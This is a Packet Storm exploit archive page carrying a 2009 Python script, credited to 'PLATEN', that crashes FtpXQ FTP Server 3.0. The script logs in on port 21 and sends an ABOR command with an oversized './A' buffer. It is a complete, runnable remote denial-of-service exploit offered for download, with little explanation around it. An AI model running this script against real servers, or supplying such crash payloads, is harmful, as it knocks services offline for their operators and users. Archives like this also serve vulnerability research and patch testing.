exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FtpXQ FTP Server 3.0 Denial Of Service

FtpXQ FTP Server 3.0 Denial Of Service
Posted Sep 15, 2009
Authored by PLATEN

FtpXq FTP Server version 3.0 remote denial of service exploit.

tags | exploit, remote, denial of service
SHA-256 | cf5987e4f0029eb7f4211bd4bde2bc2acd88137f8ee6d319998672f5baa67f58

FtpXQ FTP Server 3.0 Denial Of Service

Change Mirror Download
#!/usr/bin/python
print "############################################################"
print "## Iranian Pentesters Home ##"
print "## Www.Pentesters.Ir ##"
print "## PLATEN -[ H.jafari ]- ##"
print "## FtpXQ FTP Server 3.0 Remote Denial Of Service Exploit ##"
print "## author: PLATEN ##"
print "## E-mail && blog: ##"
print "## hjafari.blogspot.com ##"
print "## platen.secure[at]gmail[dot]com ##"
print "## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##"
print "## and all members in Pentesters.ir ##"
print "############################################################"
import socket
import sys
def Usage():
print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 6300
def start(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"

sock.send("ABOR %s\r\n" %buffer)
sock.close()

if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
sys.exit(0)



Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close